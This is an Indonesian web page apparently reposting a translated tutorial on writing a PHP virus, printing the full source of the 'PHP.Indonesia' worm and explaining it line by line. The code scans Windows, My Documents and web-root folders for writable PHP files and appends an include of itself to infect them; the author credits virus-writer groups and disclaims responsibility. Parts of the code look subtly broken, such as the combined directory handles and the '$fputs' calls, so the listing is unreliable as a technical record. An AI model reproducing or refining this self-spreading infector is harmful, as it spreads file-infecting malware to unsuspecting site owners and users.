Jumat, November 24, 2017
Text Size

Search

Update Berita

SSL to secure from hacker attacks

Open-source software developer Kai Engert has proposed an overhaul to the Internet's SSL...

Cara Menghemat Bandwidth Internet, mempercepat browsing

Ada situasi ketika menggunakan internet kita harus benar-benar hemat dengan penggunaan bandwidth ...

Istana Merespons Aksi 313 Berhentikan Ahok

Juru Bicara Presiden Joko Widodo, Johan Budi Sapto Pribowo menegaskan, Presiden Jokowi sangat...

Twitter Bakal Sediakan Layanan Berbayar?

KOMPAS.com - Setelah selama ini hanya meyediakan layanan gratis yang didukung iklan, Twitter...

Megawati: Ahok, Sudahlah Jangan Cerewet

.   Kompas.com - Megawati menasihati Ahok agar tidak terlalu banyak bicara. Mengingat kondi...

Butuh kеrjа? Cоbа cеk di Jооblе

Butuh kеrjа? Cоbа cеk di Jооblе.       Pаdа zаmаn yаng sаngаt k...

  • Tips mengatasi bosen dalam pekerjaan

    Kamis, 01 November 2012 07:48
  • Grunt Mars probe stranded in Earth orbit

    Kamis, 10 November 2011 09:40
  • SSL to secure from hacker attacks

    Senin, 27 Februari 2012 21:09
  • Cara Menghemat Bandwidth Internet, mempercepat browsing

    Minggu, 23 September 2012 18:03
  • Istana Merespons Aksi 313 Berhentikan Ahok

    Kamis, 30 Maret 2017 19:45
  • Twitter Bakal Sediakan Layanan Berbayar?

    Kamis, 30 Maret 2017 19:49
  • Megawati: Ahok, Sudahlah Jangan Cerewet

    Kamis, 30 Maret 2017 19:54
  • Butuh kеrjа? Cоbа cеk di Jооblе

    Kamis, 30 Maret 2017 20:09
Cara Sederhana membuat virus PHP
SocialTwist Tell-a-Friend

Cara Sederhana membuat virus PHP

Penilaian Pengunjung: / 6
KurangTerbaik 

Membuat virus bisa dengan bahasa apa saja dan salah satunya adalah dengan bahasa PHP. Pada artikel ini akan kita lihat bagaimana virus PHP.Indonesia yang juga dikenal dengan nama I-Worm.PHP.Indonesia dibuat.
OK,Sebelum saya di BOM...saya mau ngasih tau beberapa hal sbb :
1. Artikel ini ditujukan buat menambah pengetahuan IT kita saja
2. Saya dan penulis asli artikel ini (sevenC) tidak bertanggungjawab Jika ada lamer yang bertindak bodoh dengan menyebarkan skrip ini
3. Judul asli artikel ini adalah "Simple technique how to write PHP virus"
4. Artikel ini sebenarnya buatan sevenC ( http://sevenc.vze.com ) dan saya hanya menterjemahkannya kedalam bahasa indonesia, saya nanti akan mencantumkan kredit kepada sobat saya sevenC,karna saya udah buat artikel ini memakai versi indonesia.
5. Skrip yang saya pake disini juga merupakan skrip virus "PHP.Indonesia" buatan sevenC dan udah terdeteksi Kaspersky nama "I-Worm.PHP.Indonesia"
Ok...Kita mulai aja..!!
Pertama2 gw kasih mentahan skrip PHP.Indonesia,nanti gw akan coba ngejelasin baris demi baris arti codenya.
-------------------------------Code-------------------------------
<?
// #################################################
// # PHP.Indonesia made for all Chicken looser ground the world  #
// # By sevenC / N0:7                                                                   #
// # http://sevenc.vze.com                                                              #
// # Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya                                                       #
// ##################################################
$jawa = "indonesia.php\n";
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
$kalimantan = $jawa . $sumatra;
echo $kalimantan;
$all = opendir('C:\Windows\');
$all1 = opendir('C:\My Documents\');
$all2 = opendir('C:\InetPub\wwwRoot\');
$all3 = $all && $all1 && $all2
while ($file = readdir($all3))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.php2')) || ($exe = strstr ($file, '.php3')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'indonesia.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "PHP.indonesia - ");
$fputs($new, "By sevenC / N0:7, ");
$fputs($new, "http://trax.to/sevenC, ");
$fputs($new, " Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya , ");
$fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all3);
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
?>
--------------------------------------eoc-----------------------
Udah.. liat..? Mau belajar ? yeah... Gw akan coba jelasin baris per baris
code virus PHP.Indonesia,tapi kalu gw salah mohon dikoreksi yah...!! :) maklum
gw belum setaraf sama sevenC,hehehe... :P
-------------------------------------begin----------------------
<?
* Loe pasti tau kalo PHP musti dimulai make tanda ini --> <? buat ngunjukin
browser kalo entu skrip PHP.
// ###############################################
// # PHP.Indonesia made for all Chicken looser ground the world #
// # By sevenC / N0:7                                                           #
// # http://sevenc.vze.com                                                      #
// # Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya                                               #
// ###############################################
* Pertama loe musti tau kalo komentar dalam PHP harus dimulai dengan karakter -->> //
Jadi baris2 di atas engga akan di eksekusi karna cuman komentar.
$jawa = "indonesia.php\n";
* Pemberian nama variabel harus dimulai dengan karakter $
* Menset variabel jawa sama dengan string "indonesia.php" dan \n ntu ganti baris
* Setiap satu baris kalimat musti diakhiri dengan karakter titik koma --> ;
$sumatra = "Wellcome to Indonesian PHPlovers.\n";
* Menset variabel sumatra sama dengan string "Wellcome to Indonesian PHPlovers"
$kalimantan = $jawa . $sumatra;
* var kalimantan = var gabungan jawa dan var sumatra
echo $kalimantan;
* Menulis variabel kalimantan kedalam texttream
$all = opendir('C:\Windows\');
* var $all = membuka direktory windows

$all1 = opendir('C:\My Documents\');
* var $all1 = membuka direktory My Documents
$all2 = opendir('C:\InetPub\wwwRoot\');
* var $all2 = membuka directori wwwRoot
* karna saya rasa maksud sevenC membuka folder ini adalah karna di PWS file-file PHP
* biasanya diletakan di direktori ini
$all3 = $all && $all1 && $all2
* $all3 = gabungan dari $all , $all1 dan $all3
while ($file = readdir($all3))
* Perulangan kita mulai ketika kita membaca isi direktori
{
* Inget dengan tanda ini..!!
$inf = true;
* menSet var $inf sebagai variabel boolean = true
$exe = false;
* menSet var $exe sebagai variabel boolean = false
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.phtml')) || ($exe = strstr ($file, '.php3')) )
* Lihatlah extensi2 file yang akan kita serang (php,phtml,php3)
if ( is_file($file) && is_writeable($file) )
* Mencek atribut2 file,jika kita diijinkan menulis lalu
{
* Skali lagi jangan lupa tanda ini
$new = fopen($file, "r");
* menSet $new = membuka file baru dengan atribut read only yang hanya bisa dibaca saja
$look = fread($new, filesize($file));
* menSet $look = membaca var $new dan ukuran dari file
$yes = strstr ($look, 'indonesia.php');
* menSet $yes = $look , indonesia.php

if (!$yes) $inf = false;
* Jika bukan var $yes maka var $inf bernilai salah
}
if ( ($inf=false) )
* jika var $inf = salah kemudian
{
$new = fopen($file, "a");
* menSet $new = membuka file ( variabel $file ) / file yang diinfeksi
$fputs($new, "<!-- ");
* tulis string "<!--" kedalam file tsb ($new)

$fputs($new, "PHP.indonesia - ");
* tulis string "PHP.indonesia - " kedalam file tsb ($new)
$fputs($new, "By sevenC / N0:7, ");
* tulis string "By sevenC / N0:7, " kedalam file tsb ($new)
$fputs($new, "http://trax.to/sevenC, ");
* tulis string "http://trax.to/sevenC, " kedalam file tsb ($new)
$fputs($new, " Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya , ");
* tulis string " Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya , " kedalam file tsb ($new)
$fputs($new, "SECTORS UNDERGROUND TEAM (Indonesia)");
* tulis string tsb ($new) "SECTORS UNDERGROUND TEAM (Indonesia)" kedalam file tsb ($new)
$fputs($new, "--->");
* tulis string "--->" kedalam file tsb ($new)
$fputs($new, "<?php ");
* Tulis seluruh kode virus ini kedalam file tsb
$fputs($new, "include(\"");
* tulis string "include(\" kedalam file tsb ($new)
$fputs($new, __FILE__);
* Tulis juga seluruh kode / skrip asli dari file tsb
$fputs($new, "\"); ");
* Tulis "\" kedalam file tsb
$fputs($new, "?>");
* Tulis "?>" kedalam file tsb
return;
* Ulangi langkah-langkah diatas
}
}
closedir($all3);
* menutup semua direktori yang aktif tadi ($all3)
// PHP.Indonesia made for all Chicken looser ground the world
// By sevenC / N0:7
* komentar om sevenC
?>
* Nutup skrip virus PHP ini



--------------------------------Selesai---------------------------
Ok... mudah-mudahan loe semua ngerti apa yang gw tulis diatas,kalo kagak ? bodo amat :P
Kredit buat :

1. sevenC (http://trax.to/sevenC)
Biarpun umurnya masih belasan tapi gw salut banget sama otaknya karna
Gw udah banyak belajar dari artikelnya.greatz & Thankz man..!!
kapan neh bisa ktemuan ??
2. SECTORS (http://sectors.vze.com)
Makasih buat semua anak2 sectors baik yang masih aktif maupun tidak di forum
teruskan perjuangan kalian, jangan mau bangsa kita ditindas kebodohan.
Bantai semua lamer yang ada di Forum.
3. IVWA / Indonesian Virus Writer Association (http://www.geocities.com/ivwa_staff)
Kapan neh peluncuran zine pertama ? gw udah gak sabar neh...!!
4. semua anak2 yang pernah gw temuin di #sectors (woi channel jangan ditinggal molo..!!)
saran dan kritik kirim ke Alamat e-mail ini diproteksi dari spambot, silahkan aktifkan Javascript untuk melihatnya
stupy (ex member of sectors)

Comments
Add New Search
Write comment
Name:
Email:
 
Website:
Title:
 
:angry::0:confused::cheer:B):evil::silly::dry::lol::kiss::D:pinch:
:(:shock::X:side::):P:unsure::woohoo::huh::whistle:;):s
:!::?::idea::arrow:
 
Please input the anti-spam code that you can read in the image.

3.25 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Advertisement Site




Ads - World Friend

Ads - World Friend

Berita lain-lainnya

Seberapa bahayakah Radiasi Nuklir Fukushima
16/03/2011 | Indra Febria Widy
article thumbnail

Reaktor unit 2 Pembangkit Listrik Tenaga Nuklir (PLTN) Fukushima Daiichi, Jepang, meledak Selasa (15/3) dini hari, dan asap kembali tampak membumbung tinggi di langit Fukushima. Ledakan ini  [ ... ]


Keasyikan bermain bisa berakibat fatal
24/11/2011 | Indra Febria Widy
article thumbnail

Masih lekat di ingatan kita awal tahun lalu ketika seorang bayi di Suwon, Korea Selatan, meninggal karena diabaikan orangtuanya. Bukan karena apa-apa, orangtuanya melupakan Sa-rang (nama bayi itu) k [ ... ]